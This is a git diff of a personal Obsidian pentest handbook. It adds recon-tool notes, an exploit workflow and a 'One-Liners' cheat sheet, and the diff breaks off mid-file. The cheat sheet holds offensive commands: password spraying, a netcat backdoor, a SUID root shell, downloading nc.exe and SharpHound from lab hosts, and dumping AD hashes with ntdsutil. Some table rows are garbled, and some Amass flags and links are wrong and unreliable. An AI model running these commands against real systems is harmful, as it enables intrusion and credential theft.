diff --git a/.DS_Store b/.DS_Store index 123fa21..827dc1c 100644 Binary files a/.DS_Store and b/.DS_Store differ diff --git a/.obsidian/app.json b/.obsidian/app.json index 6abe4c1..c9e99e1 100644 --- a/.obsidian/app.json +++ b/.obsidian/app.json @@ -1,3 +1,4 @@ { - "alwaysUpdateLinks": true + "alwaysUpdateLinks": true, + "promptDelete": false } \ No newline at end of file diff --git a/.obsidian/graph.json b/.obsidian/graph.json index 42a46ec..b0111ac 100644 --- a/.obsidian/graph.json +++ b/.obsidian/graph.json @@ -17,6 +17,6 @@ "repelStrength": 10, "linkStrength": 1, "linkDistance": 250, - "scale": 1, + "scale": 0.7554462084221868, "close": true } \ No newline at end of file diff --git a/.obsidian/workspace.json b/.obsidian/workspace.json index bda6d29..6fcb481 100644 --- a/.obsidian/workspace.json +++ b/.obsidian/workspace.json @@ -11,40 +11,11 @@ "id": "21b5784e2023f491", "type": "leaf", "state": { - "type": "markdown", - "state": { - "file": "01 - Planning.md", - "mode": "source", - "source": false - } - } - }, - { - "id": "2a670ea5f942fc2d", - "type": "leaf", - "state": { - "type": "markdown", - "state": { - "file": "02 - Scoping.md", - "mode": "source", - "source": false - } - } - }, - { - "id": "b310d53602dfbef1", - "type": "leaf", - "state": { - "type": "markdown", - "state": { - "file": "README.md", - "mode": "source", - "source": false - } + "type": "graph", + "state": {} } } - ], - "currentTab": 2 + ] } ], "direction": "vertical" @@ -111,7 +82,6 @@ "state": { "type": "backlink", "state": { - "file": "README.md", "collapseAll": false, "extraContext": false, "sortOrder": "alphabetical", @@ -128,7 +98,6 @@ "state": { "type": "outgoing-link", "state": { - "file": "README.md", "linksCollapsed": false, "unlinkedCollapsed": true } @@ -150,9 +119,7 @@ "type": "leaf", "state": { "type": "outline", - "state": { - "file": "README.md" - } + "state": {} } } ] @@ -172,33 +139,46 @@ "command-palette:Open command palette": false } }, - "active": "b310d53602dfbef1", + "active": "21b5784e2023f491", "lastOpenFiles": [ - "02 - Scoping.md", "README.md", - "tools/OSINT TOOLS.md", - "templates/VULNERABILITY ASSESMENT REPORT.md", - "templates/PASTA.md", - "tools", + "tools/1.Information-Gathering/Global-Steps.md", "01 - Planning.md", - "templates/RISK REGISTER.md", - "templates/PENTEST REPORT TEMPLATE.md", - "templates/INCIDENT REPORT TEMPLATE.md", - "templates/ASSET INVENTORY.md", - "templates/legal/Non-Disclosure Agreement.md", - "templates/legal/Request for Information (RFI).md", - "templates/legal/Statement of Work.md", + "02 - Scoping.md", + "Red Team/1 - Information Gathering/2 - Active Reconnaissance/• AMASS.md", + "Red Team/1 - Information Gathering/2 - Active Reconnaissance", + "Red Team/1 - Information Gathering", + "Red Team", + "tools/OSINT TOOLS.md", + "tools/2.Scanning-and-Enumeration/3.Ports/Ports-Links/20-and-21-FTP/FTP.md", + "tools/2.Scanning-and-Enumeration/2.Enumeration/Vulnerability/Nikto.md", + "tools/2.Scanning-and-Enumeration/2.Enumeration/Subdomain/Wayback Crawler.md", + "tools/2.Scanning-and-Enumeration/2.Enumeration/Subdomain/Google Dorking.md", + "tools/2.Scanning-and-Enumeration/2.Enumeration/Subdomain/Gobuster.md", + "tools/2.Scanning-and-Enumeration/2.Enumeration/Subdomain/AMASS.md", + "tools/2.Scanning-and-Enumeration/2.Enumeration/Directory/Gobuster.md", + "tools/2.Scanning-and-Enumeration/1.Scanner/Threader-3000.md", + "tools/2.Scanning-and-Enumeration/1.Scanner/Mass-Scan.md", + "tools/2.Scanning-and-Enumeration/1.Scanner/Nmap/More-Information.md", + "tools/2.Scanning-and-Enumeration/1.Scanner/Nmap/Commands.md", + "tools/1.Information-Gathering/2.Active-Reconnaissance/Whatweb.md", + "tools/1.Information-Gathering/2.Active-Reconnaissance/Traceroute.md", + "tools/1.Information-Gathering/2.Active-Reconnaissance/Telnet.md", + "tools/1.Information-Gathering/2.Active-Reconnaissance/Sn1per.md", + "tools/1.Information-Gathering/2.Active-Reconnaissance/Netcat.md", + "tools/1.Information-Gathering/2.Active-Reconnaissance/DNSenum.md", + "tools/1.Information-Gathering/2.Active-Reconnaissance/Curl.md", + "tools/1.Information-Gathering/2.Active-Reconnaissance/AMASS.md", + "tools/1.Information-Gathering/1.Passive-Reconnaissance/Whois.md", + "tools/5.Machine/3.Active-Directory/General/Exploitation/AV-Detection-and-Evasion/Evasion-Techniques/Tools", + "tools/5.Machine/1.Linux/General/Exploitation/AV-Detection-Evasion/Evasion-Techniques/Tools", + "tools/5.Machine/3.Active-Directory/General/Exploitation/AV-Detection-and-Evasion/Evasion-Techniques", + "tools/5.Machine/3.Active-Directory/General/Exploitation/AV-Detection-and-Evasion/Detection-Methods", + "tools/5.Machine/3.Active-Directory/General/Exploitation/5.Exploiting-AD/Specific-Topics", + "tools/5.Machine/1.Linux/General/Exploitation/AV-Detection-Evasion/Evasion-Techniques", + "tools/5.Machine/1.Linux/General/Exploitation/AV-Detection-Evasion/Detection-Methods", "templates/Untitled Diagram.svg", "templates/METHODOLOGY.svg", - "Pasted image 20240824205517.png", - "2024-08-24.md", - "templates/legal/DPA-en.odt", - "templates/legal/MSA-en.odt", - "templates/legal/NDA-en.odt", - "templates/legal/NDA.md", - "templates/legal", - "templates", - "().md", - "Welcome.md" + "Pasted image 20240824205517.png" ] } \ No newline at end of file diff --git a/README.md b/README.md index 332e7e1..e5ff777 100644 --- a/README.md +++ b/README.md @@ -2,6 +2,7 @@ > This is a security handbook I complile for pentest and vulnerabilty analysis purposes. > It is meant to be used with Obsidian. + ## Progress - Planning [100%] diff --git a/tools/.DS_Store b/tools/.DS_Store new file mode 100644 index 0000000..5a02ff4 Binary files /dev/null and b/tools/.DS_Store differ diff --git a/tools/0.Bookmark/Exploit-Workflow.md b/tools/0.Bookmark/Exploit-Workflow.md new file mode 100644 index 0000000..20b860d --- /dev/null +++ b/tools/0.Bookmark/Exploit-Workflow.md @@ -0,0 +1,72 @@ +## How to work through a vulnerable host +#### Scan for vulnerabilities +We're searching for vulnerabilities in the host, application, or information leakage. + +- NMAP scanning +- vhost enumeration +- Gobuster +- Ping scanning +- Google Dorking + +--- +#### Determine Versions +After gathering information about the host and applications, we need to determine what versions they have. + +- Banner grabbing +- netcat / telnet +- Shodan and Censys +- Inspect headers +- Throw intentional errors + +--- +#### Find Exploits +Find exploits for identified versions and software on host + +- searchsploit +- exploit-db +- Google +- Shodan + +--- +#### Craft Payload +Create malicious payload through identified exploit. Allows further exploitation through reverse shells or other similar exploitation routes. + +- msfvenom +- searchsploit + +--- +#### Execute Payload +Execute the payload we made, there can be some very interesting and creative ways to achieve this! + +- Invoke-Command +- runas +- sudo + +--- +#### Establish Persistence +Ensure that our exploits will stay persistent on the host + +- service takeovers +- cron jobs +- startup scripts + +--- +#### Escalate Privileges +Move from a foothold to root! + +- get-process +- PowerUp.ps1 +- LinEnum.sh +- LinPEAS +- WinPEAS +- suid/guid +- sudo -l + +--- +#### Exfiltrate Data +Steal the data on the host! + +- Invoke-WebRequest + - iwr +- curl +- Imagination!! \ No newline at end of file diff --git a/tools/0.Bookmark/One-Liners.md b/tools/0.Bookmark/One-Liners.md new file mode 100644 index 0000000..45c4cea --- /dev/null +++ b/tools/0.Bookmark/One-Liners.md @@ -0,0 +1,65 @@ +# Linux + +| Command | Purpose | | | +| -------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------- | +| `GREENIE=haha; export GREENIE` | Creates an environment variable named `GREENIE` with value `haha`, then exports it to be available to other programs | | | +| `PATH=$PATH:/root/haha` | Adds the folder `/root/haha` to the system `PATH` environment variable while retaining the previous `PATH` value | | | +| `sort | uniq -c | sort -n` | Takes `stdin`, sorts it, finds out the count of each unique value, then sorts by the count value in ascending order | +| `cat squid_access.log | sort -k 2 | head` | Reads `squid_access.log`, sorts it based on the second column, and displays the first 10 lines of the sorted output | +| `wc -l` | Counts the number of lines in a file or from `stdin` | | | +| `wc -c` | Counts the number of bytes in a file or from `stdin` | | | +| `wc -w` | Counts the number of words in a file or from `stdin` | | | +| `awk '{print $1,$4}'` | Prints the first and fourth (non-zero indexed) characters/fields from `stdin` | | | +| `awk '{print $(NF-1)}'` | Prints the second to last column from `stdin` | | | +| `awk '{print length, $1}'` | Prints the length of each line and the contents of the first field/column from `stdin` | | | +| `awk '{ sum += $1 } END { print sum }'` | Takes the lines from a file/`stdin` and adds up the values in the first field/column, acting as a quick and dirty calculator | | | +| `cat peptides.txt | while read line; do echo $line; done` | Reads in each line from `peptides.txt`, then performs `echo` for each line | | +| `cat users.txt | while read i; do echo trying $i; smbmap -u '$i' -p '$i' -H 10.10.10.172; done` | Reads in each line from `users.txt`, then performs a password spraying attack on `10.10.10.172` using `smbmap` | | +| `for i in {1..5}; do echo $i; done` | Loops from 1 to 5 and displays the value of `i` for each iteration | | | +| `for i in {000..999}; do echo KEY-HAHA-$i; done` | Creates a list of all values from `KEY-HAHA-000` to `KEY-HAHA-999` and displays each value | | | +| `TF=$(mktemp -d)` | Creates a temporary directory and assigns its path to an environment variable named `TF` | | | +| `${#TF}` | Outputs the length of the value stored in the environment variable `TF` | | | +| `sed 's/12/13/g'` | Replaces all instances of `12` with `13` in stdin, will replace `1234` with `1334` | | | +| `sed -i.bak '/line to delete/d' | ` | Deletes a line of text for all files in a directory | | +| `xxd -p` | Prints the hex of stdin or a file only, without hexdump format | | | +| `xxd -r` | Interprets raw hex from stdin, can redirect to save the hex to a file | | | +| `tr -d '\r' | tr -d '\n' | xxd -r -p` | Takes hex input, removes newlines, and places it into a file | +| `find / -user Matt 2>/dev/null` | Finds all files owned by `Matt` on the box, redirects `stderr` to null | | | +| `find /etc -type f --name apache2. | ` | Finds any file which begins with `apache2. | ` in `/etc` | +| `grep -E "(25[0-5] | 2[0-4][0-9] | [01]?[0-9][0-9]?)\.(25[0-5] | 2[0-4][0-9] | +| `curl -d "param1=value¶m2=value" https://example.com/resource.cgi` | Sends parameters with `curl` | | | +| `date -d @1286536308` | Converts an epoch timestamp to `date` output | | | +| `mknod backpipe p; /bin/bash 0backpipe` | Creates a netcat backdoor without `-e` support | | +| `tar -zcvf files.tar.gz /var/log/apache2` | Creates a `files.tar.gz` archive of all files in `/var/log/apache2` | | | +| `prips 10.10.10.0/24` | Prints all IPs in a specific subnet | | | +| `ifconfig eth0 169.254.0.1 netmask 255.255.0.0 broadcast 169.254.255.255` | Assigns an IP address from the terminal | | | +| `ifconfig eth0 down; ifconfig eth0 hw ether 00:11:22:33:44:55; ifconfig eth0 up` | Changes the MAC address for interface `eth0` | | | +| `dhclient eth0` | Requests a DHCP address on interface `eth0` | | | +| `dd if=./input.file of=./outfile` | Makes a bit-by-bit copy of a file or system | | | +| `sudo ln -s /usr/bin/python3 /usr/bin/python` | Creates a symbolic link for Python to run Python 3 | | | +| `sudo mkdir /mnt/new` | Creates a new directory `/mnt/new` with `sudo` permissions | | | +| `mount /dev/sbd1 /mnt/new` | Mounts the file system located at `/dev/sbd1` to the directory `/mnt/new` | | | +| `umount /dev/sdb1` | Unmounts the file system located at `/dev/sdb1` | | | +| `sudo route add -net default gw 10.10.0.1 netmask 0.0.0.0 dev wlan0 metric 1` | Adds another default route with a higher metric to choose a different interface to access the Internet | | | +| `sudo dhclient wlan0` | Requests a new DHCP lease on interface `wlan0` | | | +| `openssl enc -aes-256-cbc -salt -in file.txt -out file.txt.enc` | Encrypts a file with a password at the command line | | | +| `openssl enc -aes-256-cbc -d -in file.txt.enc -out file.txt` | Decrypts a file using a password at the command line | | | +| `sudo chmod +s /bin/bash`
`bash -p` | Execute the command in a machine, and if root access is lost, use "bash -p" for a root shell. | | | + +--- + +# Windows + +| Command | Purpose | +| ------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------- | +| `get-childitem -hidden` | Shows all hidden files in the current directory | +| `gci -recurse C:\ | % { select-string -path $_ -pattern password} 2>$null` | +| `1..255 | % {ping -n1 192.168.0.$_ | +| `(New-Object System.Net.Webclient).DownloadFile("http://10.1.1.1:8000/nc.exe","C:\nc.exe")` | Downloads a file to the `C:\` location | +| `certutil -hashfile ntds.dit md5` | Hashes a file using MD5 | +| `certutil -encodehex ntds.dit ntds.hex` | Encodes a file as hexadecimal | +| `certutil -encode test.jpg test.base64` | Encodes a file as base64 | +| `certutil -decode test.base64 test.jpg` | Decodes a base64-encoded file | +| `iwr -uri http://10.10.14.27/SharpHound.ps1 -outfile SharpHound.ps1` | Downloads a file from another machine | +| `$x=""; while ($true) { $y=get-clipboard -raw; if ($x -ne $y) { write-host $y; $x=$y } }` | Monitors the clipboard and prints its contents to the screen | +| `ntdsutil; activate instance ntds; ifm; create full C:\ntds; quit; quit;` | Uses `ntdsutil` to obtain the `SYSTEM` registry and hive data as a backup, containing user hashes to crack | diff --git a/tools/1.Information-Gathering/1.Passive-Reconnaissance/DNS/DNSdumper.md b/tools/1.Information-Gathering/1.Passive-Reconnaissance/DNS/DNSdumper.md new file mode 100644 index 0000000..d7a5267 --- /dev/null +++ b/tools/1.Information-Gathering/1.Passive-Reconnaissance/DNS/DNSdumper.md @@ -0,0 +1,6 @@ +## What is DNSdumper + +DNSDumper is a websitetool that helps in enumerating DNS information about a domain. It is designed to gather all the DNS information related to a domain such as hostnames, IP addresses, DNS record types, and more. + +## Website +For more information on crt.sh, including documentation and the latest updates, users can visit the project website: https://dnsdumpster.com/ diff --git a/tools/1.Information-Gathering/1.Passive-Reconnaissance/DNS/Dig.md b/tools/1.Information-Gathering/1.Passive-Reconnaissance/DNS/Dig.md new file mode 100644 index 0000000..eb34a04 --- /dev/null +++ b/tools/1.Information-Gathering/1.Passive-Reconnaissance/DNS/Dig.md @@ -0,0 +1,14 @@ +## What is DIG? +Dig (Domain Information Groper) is a command-line tool for querying DNS (Domain Name System) servers. It is a powerful tool used for troubleshooting DNS-related problems and obtaining DNS-related information. It is an essential tool for network administrators, web developers, and anyone else who needs to understand how the DNS works. + +## Common Uses and Commands +Here is the most common use of Dig and the command you can use: + +``` +dig DOMAIN.com +``` + +There are many more options and commands available for Dig, including reverse DNS lookups, querying for specific DNS records, and more. For more information, consult the Dig manual page by running the command `man dig` in your terminal. + +## More Information +For more information about Dig, check out the official Dig documentation on the Internet Systems Consortium (ISC) website: https://linuxize.com/post/how-to-use-dig-command-to-query-dns-in-linux/ diff --git a/tools/1.Information-Gathering/1.Passive-Reconnaissance/DNS/Nslookup.md b/tools/1.Information-Gathering/1.Passive-Reconnaissance/DNS/Nslookup.md new file mode 100644 index 0000000..d6b29d1 --- /dev/null +++ b/tools/1.Information-Gathering/1.Passive-Reconnaissance/DNS/Nslookup.md @@ -0,0 +1,17 @@ +## What is Nslookup? +Nslookup is a command-line tool used to query the Domain Name System (DNS) to obtain domain name or IP address mapping or other DNS records. It is a utility available on most operating systems, including Windows, macOS, and Linux. + + +## Common uses and Commands +- **Lookup IP address of a domain**: To find the IP address of a domain, you can run the following command: `nslookup example.com`. + +- **Reverse lookup**: You can perform a reverse lookup to find the domain name associated with an IP address. To do this, run the following command: `nslookup -type=PTR IP_address` + +- **Specify a DNS server**: By default, nslookup uses the default DNS server configured on your system. You can specify a different DNS server to use by running the following command: `nslookup example.com DNS_server` + +- **Query a specific DNS record type**: You can query for a specific type of DNS record, such as MX, SOA, or NS, by using the "-type" option. For example, to query for the MX record of a domain, run the following command: `nslookup -type=MX example.com`. + - More Options ---> A, AAAA, CNAME, MX, SQA, TXT + +## More Information +More information and documentation for NSlookup: [Microsoft Docs](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/nslookup) + diff --git a/tools/1.Information-Gathering/1.Passive-Reconnaissance/DNS/SSL-TLS-Certificates.md b/tools/1.Information-Gathering/1.Passive-Reconnaissance/DNS/SSL-TLS-Certificates.md new file mode 100644 index 0000000..86129a9 --- /dev/null +++ b/tools/1.Information-Gathering/1.Passive-Reconnaissance/DNS/SSL-TLS-Certificates.md @@ -0,0 +1,13 @@ +## what is crt.sh? +crt.sh is a web-based tool that allows users to search for SSL/TLS certificates that have been issued for a particular domain. It provides a simple and efficient way to view and analyze SSL/TLS certificates for a specific domain. The tool aggregates certificate transparency data from various Certificate Authorities (CAs) and displays them in an easy-to-read format. + +## Website +```Terminal +- http://crt.sh/ +``` + +For more information on the commands and options available, users can refer to the crt.sh documentation. + +## More Information +For more information on crt.sh, including documentation and the latest updates, users can visit the project website: https://crt.sh + diff --git a/tools/1.Information-Gathering/1.Passive-Reconnaissance/DNS/Shodan.md b/tools/1.Information-Gathering/1.Passive-Reconnaissance/DNS/Shodan.md new file mode 100644 index 0000000..9f82e2c --- /dev/null +++ b/tools/1.Information-Gathering/1.Passive-Reconnaissance/DNS/Shodan.md @@ -0,0 +1,78 @@ +--- +dg-publish: "True" +--- +--- --- +

What is Shodan

+Shodan is a search engine for Internet-connected devices. It allows users to search for specific types of devices (e.g. webcams, routers, servers, etc.) connected to the Internet using a variety of filters. To use Shodan in command line in Linux, you can install the "shodan" command-line interface (CLI) tool. This tool can be installed using the pip package manager by running the command "pip install shodan". Once installed, you can use the "shodan" command to perform various tasks, such as searching for specific devices, downloading data, and more. To use the tool, you will need to have an API key, which can be obtained by creating an account on the Shodan website. + +--- +

Common uses and Commands

+The **shodan** CLI has a lot of commands, the most popular/ common ones are documented below. For the full list of commands just run the tool without any arguments: + +Website ---> https://www.shodan.io/dashboard + +

Terminal Commands

+- Count Number of Results + Returns the number of results for a search query. + + - Example + ``` + $ shodan count microsoft iis 6.0 + 5310594 + ``` + +- Download Results + Search Shodan and download the results into a file where each line is a JSON banner. For more information on what the banner contains check out: + + [Banner Specification](https://developer.shodan.io/api/banner-specification) + + By default it will only download 1,000 results, if you want to download more look at the **--limit** flag. + + The **download** command is what you should be using most often when getting results from Shodan since it lets you save the results and process them afterwards using the **parse** command. Because paging through results uses query credits, it makes sense to always store searches that you're doing so you won't need to use query credits for a search you already did in the past. + + - Example + + ![](https://cli.shodan.io/img/download.png) + +- Host + See information about the host such as where it's located, what ports are open and which organization owns the IP. + + Example + ``` + $ shodan host 189.201.128.250 + ``` + + ![](https://cli.shodan.io/img/host.png) + +- Find you IP (Myip) + Returns your Internet-facing IP address. + + - Example + ``` + $ shodan myip + 199.30.49.210 + ``` + +- Parse + Use **parse** to analyze a file that was generated using the **download** command. It lets you filter out the fields that you're interested in, convert the JSON to a CSV and is friendly for pipe-ing to other scripts. + + - Example + + The following command outputs the IP address, port and organization in CSV format for the previously downloaded Microsoft-IIS data: + ``` + $ shodan parse --fields ip_str,port,org --separator , microsoft-data.json.gz + ``` + + ![](https://cli.shodan.io/img/parse.png) + +- Search + This command lets you search Shodan and view the results in a terminal-friendly way. By default it will display the IP, port, hostnames and data. You can use the **--fields** parameter to print whichever banner fields you're interested in. + + - Example + + To search Microsoft IIS 6.0 and print out their IP, port, organization and hostnames use the following command: + ``` + $ shodan search --fields ip_str,port,org,hostnames microsoft iis 6.0 + ``` + + ![](https://cli.shodan.io/img/search.png) \ No newline at end of file diff --git a/tools/1.Information-Gathering/1.Passive-Reconnaissance/Ping.md b/tools/1.Information-Gathering/1.Passive-Reconnaissance/Ping.md new file mode 100644 index 0000000..879fb1b --- /dev/null +++ b/tools/1.Information-Gathering/1.Passive-Reconnaissance/Ping.md @@ -0,0 +1,17 @@ +## what is ping? +Ping is a network diagnostic tool that sends packets of data to a target host and measures the time it takes for the packets to be transmitted and received. The tool is used to test the connectivity of a network and to determine the round-trip time (RTT) for data packets to travel between two devices. + +## Common use and commands: +The most common use of ping is to test whether a host is reachable over the network. To use ping, simply open a command prompt or terminal and type "ping" followed by the target host's IP address or domain name. The tool will send a series of ICMP packets to the target host and report the results, including the RTT and any packet loss. + +Ping +```Terminal +ping -c X IP +``` + +- -c ---> Number of ping sent + +TTL response from the ping might give some infromation about the operating system +- Linux ---> 64 or less +- Windows ---> 128 +- Cisco ---> 128 - 256 \ No newline at end of file diff --git a/tools/1.Information-Gathering/1.Passive-Reconnaissance/Shodan.md b/tools/1.Information-Gathering/1.Passive-Reconnaissance/Shodan.md new file mode 100644 index 0000000..f747ad8 --- /dev/null +++ b/tools/1.Information-Gathering/1.Passive-Reconnaissance/Shodan.md @@ -0,0 +1,20 @@ +## What is Shodan +When you are tasked to run a penetration test against specific targets, as part of the passive reconnaissance phase, a service like [Shodan.io](https://www.shodan.io/) can be helpful to learn various pieces of information about the client’s network, without actively connecting to it. Furthermore, on the defensive side, you can use different services from Shodan.io to learn about connected and exposed devices belonging to your organization. + +Shodan.io tries to connect to every device reachable online to build a search engine of connected “things” in contrast with a search engine for web pages. Once it gets a response, it collects all the information related to the service and saves it in the database to make it searchable. Consider the saved record of one of tryhackme.com’s servers. + +![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/a8ac6c22a64b8413ee8d02c2224eddac.png) + +This record shows a web server; however, as mentioned already, Shodan.io collects information related to any device it can find connected online. Searching for `tryhackme.com` on Shodan.io will display at least the record shown in the screenshot above. Via this Shodan.io search result, we can learn several things related to our search, such as: + +- IP address +- hosting company +- geographic location +- server type and version + +You may also try searching for the IP addresses you have obtained from DNS lookups. These are, of course, more subject to change. On their [help page](https://help.shodan.io/the-basics/search-query-fundamentals), you can learn about all the search options available at Shodan.io, and you are encouraged to join TryHackMe’s [Shodan.io](https://tryhackme.com/room/shodan). + +## Website +```Terminal +- https://www.shodan.io +``` diff --git a/tools/1.Information-Gathering/1.Passive-Reconnaissance/Whois.md b/tools/1.Information-Gathering/1.Passive-Reconnaissance/Whois.md new file mode 100644 index 0000000..7e355a6 --- /dev/null +++ b/tools/1.Information-Gathering/1.Passive-Reconnaissance/Whois.md @@ -0,0 +1,20 @@ +## what is WHOIS? + +WHOIS is a network protocol used to query a database that contains information about domain name registrations and IP address assignments. The WHOIS database is maintained by various organizations, including Internet Service Providers (ISPs), domain name registrars, and regional Internet registries. + + +## Common use and commands: +The most common use of WHOIS is to obtain information about a particular domain name or IP address. To use WHOIS, simply enter the domain name or IP address in a WHOIS lookup tool, which will query the appropriate WHOIS server and return the relevant information. + +WHOIS +```Terminal +whois DOMAIN_NAME +``` + +- Registrar ---> Via which registrar was the domain name registered? +- Contact ---> Name, organization, address, phone, among other things. +- Name Server ---> Which server to ask to resolve the domain name? +- Creation, update, and expiration dates + +## More Information +For more information on WHOIS, including how to perform WHOIS lookups and advanced queries, users can refer to the tool's documentation or the website of a WHOIS lookup tool provider, such as ICANN (Internet Corporation for Assigned Names and Numbers) or WHOIS.net. Additionally, the source code for many WHOIS clients and servers is available on GitHub: [https://github.com/topics/whois](https://github.com/topics/whois). \ No newline at end of file diff --git a/tools/1.Information-Gathering/2.Active-Reconnaissance/AMASS.md b/tools/1.Information-Gathering/2.Active-Reconnaissance/AMASS.md new file mode 100644 index 0000000..a6be762 --- /dev/null +++ b/tools/1.Information-Gathering/2.Active-Reconnaissance/AMASS.md @@ -0,0 +1,32 @@ +## What is Amass? +Amass is a popular open-source tool used for reconnaissance and enumeration during security assessments. It is designed to discover and map external assets of an organization, including subdomains, IP addresses, and associated metadata. + +The tool utilizes a combination of active and passive reconnaissance techniques, including DNS and zone transfers, web scraping, and web archive searching. It also integrates with various third-party data sources, such as Shodan, Censys, and VirusTotal, to enhance the accuracy and completeness of its findings. + +Amass can be used to enumerate APIs, identify SSL/TLS certificates, perform DNS reconnaissance, map network routes, scrape web pages, search web archives, and obtain WHOIS information. It is commonly used by security professionals, bug bounty hunters, and penetration testers to gather information about their target organization and identify potential attack vectors. + +## Common Use and Commands: +Amass is commonly used by security professionals, bug bounty hunters, and penetration testers to gather information about their target organization and identify potential attack vectors. + +The following are some common commands used in Amass: + +#### Subdomain Enumeration: +- Perform a DNS enumeration: `amass enum -d ` +- To use passive DNS enumeration: `amass enum --passive -d ` +- To use active DNS enumeration: `amass enum --active -d ` +- To perform subdomain bruteforcing: `amass enum -d -brute` + +#### Directory Enumeration: +- To brute-force directories and files: `amass enum -active -d -w ` +- To brute-force directories with a defined extension: `amass enum -active -d -w -dirsearch /path/to/extensions` +- To find URLs with HTTP response code 200: `amass enum -active -d -w -status-code 200` + +#### API Discovery: +- To discover APIs using passive techniques: `amass intel -d -api` +- To discover APIs using active techniques: `amass intel -d -api -active` +- To use a custom API key for Shodan: `amass intel -d -shodan-apikey ` + +Amass supports various options and flags to customize the scan, such as setting the output format, configuring rate limits, and enabling verbose logging. + +## More Information +For more information on Amass, including the latest updates and documentation, please visit the project's official Github repository: https://github.com/OWASP/Amass diff --git a/tools/1.Information-Gathering/2.Active-Reconnaissance/Curl.md b/tools/1.Information-Gathering/2.Active-Reconnaissance/Curl.md new file mode 100644 index 0000000..3b5b656 --- /dev/null +++ b/tools/1.Information-Gathering/2.Active-Reconnaissance/Curl.md @@ -0,0 +1,30 @@ +## What is cURL? + +cURL is a command-line tool and library for transferring data with URLs. It supports various protocols, including HTTP, HTTPS, FTP, and many others. cURL is widely used for interacting with web services, fetching web pages, and transferring files via different protocols. + +## Common Use and Commands: + +cURL's versatility makes it a valuable tool for developers, sysadmins, and security professionals. Here's how to use cURL, including the `-i` option to retrieve only the headers: + +```Terminal +curl [OPTIONS] [URL] +``` + +Common options include: +- `-i`: Include the HTTP headers in the output. +- `-H`: Specify custom headers. +- `-X`: Specify the request method (e.g., GET, POST). +- `-L`: Follow redirects. +- `-o`: Write output to a file. + +Example to retrieve only headers: +```Terminal +curl -i example.com +``` + +Output may include: +- HTTP headers such as status code, content type, and server information. + +## More Information: + +For further details on cURL and its advanced usage, users can consult the official documentation or visit the cURL website. Additionally, the source code for cURL is available on GitHub: [https://github.com/curl/curl](https://github.com/curl/curl). \ No newline at end of file diff --git a/tools/1.Information-Gathering/2.Active-Reconnaissance/DNSenum.md b/tools/1.Information-Gathering/2.Active-Reconnaissance/DNSenum.md new file mode 100644 index 0000000..9433c88 --- /dev/null +++ b/tools/1.Information-Gathering/2.Active-Reconnaissance/DNSenum.md @@ -0,0 +1,21 @@ +## What is DNSenum? + +DNSenum is a versatile DNS enumeration tool used primarily for information gathering during security assessments and penetration testing. It is written in Perl and provides capabilities for enumerating DNS information such as hostnames, subdomains, DNS records, and zone transfers. DNSenum automates the process of querying DNS servers to collect valuable intelligence about a target domain's infrastructure. + +

Common Use and Commands:

+ +DNSenum is commonly used for: + +- **DNS Enumeration**: Gathering information about a target domain's DNS infrastructure, including subdomains, hostnames, and associated IP addresses. +- **Zone Transfers**: Attempting zone transfers to retrieve all DNS records for a domain, which can reveal sensitive information about the target's network topology. +- **Brute-Force Enumeration**: Performing brute-force DNS enumeration to discover additional subdomains and hostnames. + +The following are some common commands used with DNSenum: +``` +dnsenum ---> To perform a basic DNS enumeration +dnsenum -f ---> For more advanced enumeration and zone transfer attempts +``` + +## More Information +For more information on DNSenum, including installation instructions, usage examples, and updates, please visit the project's official GitHub repository: [https://github.com/fwaeytens/dnsenum](https://github.com/fwaeytens/dnsenum) + diff --git a/tools/1.Information-Gathering/2.Active-Reconnaissance/Netcat.md b/tools/1.Information-Gathering/2.Active-Reconnaissance/Netcat.md new file mode 100644 index 0000000..d9ef77d --- /dev/null +++ b/tools/1.Information-Gathering/2.Active-Reconnaissance/Netcat.md @@ -0,0 +1,20 @@ +## what is Netcat? +Netcat (often abbreviated as "nc") is a powerful networking tool that can be used to read and write data across network connections using TCP or UDP protocols. It is commonly used for troubleshooting network issues, as well as for performing network-related tasks such as port scanning, file transfers, and remote shell access. + +## Common use and commands: +First, you can connect to a server, as you did with Telnet, to collect its banner using `nc 10.10.248.159 PORT`, which is quite similar to our previous `telnet 10.10.248.159 PORT`. Note that you might need to press SHIFT+ENTER after the GET line. + +- Example + ![[Screenshot_2022-09-01_22-27-07.png]] + + In the terminal shown above, we used netcat to connect to 10.10.248.159 port 80 using `nc 10.10.248.159 80`. Next, we issued a get for the default page using `GET / HTTP/1.1`; we are specifying to the target server that our client supports HTTP version 1.1. Finally, we need to give a name to our host, so we added on a new line, `host: netcat`; you can name your host anything as this has no impact on this exercise. + + Based on the output `Server: nginx/1.6.2` we received, we can tell that on port 80, we have Nginx version 1.6.2 listening for incoming connections. + +Netcat +```Terminal +nc IP PORT + +GET / HTTP/VERSION (check on website targeted what version they use) +host: netcat +``` diff --git a/tools/1.Information-Gathering/2.Active-Reconnaissance/Sn1per.md b/tools/1.Information-Gathering/2.Active-Reconnaissance/Sn1per.md new file mode 100644 index 0000000..96119b9 --- /dev/null +++ b/tools/1.Information-Gathering/2.Active-Reconnaissance/Sn1per.md @@ -0,0 +1,22 @@ +## What is Sn1per? + +Sn1per is a powerful penetration testing tool designed for security professionals and penetration testers. It is written in Python and Bash and provides a comprehensive suite of features for reconnaissance, scanning, enumeration, and exploitation. Sn1per automates various stages of the penetration testing process, making it efficient and effective for assessing the security posture of target systems. + +## Common Use and Commands: + +Sn1per is commonly used for: + +- **Reconnaissance**: Gathering information about target systems, such as open ports, services, and vulnerabilities. +- **Scanning**: Conducting port scans, service enumeration, and vulnerability scanning using tools like Nmap and Nessus. +- **Enumeration**: Enumerating users, shares, and other resources on target networks. +- **Exploitation**: Exploiting discovered vulnerabilities to gain unauthorized access to systems. + +The following are some common commands used with Sn1per: +``` +./sn1per -t ---> To initiate a basic scan +./sn1per -h ---> For more advanced scanning and enumeration +``` + +## More Information +For more information on Sn1per, including installation instructions, usage examples, and updates, please visit the project's official GitHub repository: [https://github.com/1N3/Sn1per](https://github.com/1N3/Sn1per) + diff --git a/tools/1.Information-Gathering/2.Active-Reconnaissance/Telnet.md b/tools/1.Information-Gathering/2.Active-Reconnaissance/Telnet.md new file mode 100644 index 0000000..b03eaa1 --- /dev/null +++ b/tools/1.Information-Gathering/2.Active-Reconnaissance/Telnet.md @@ -0,0 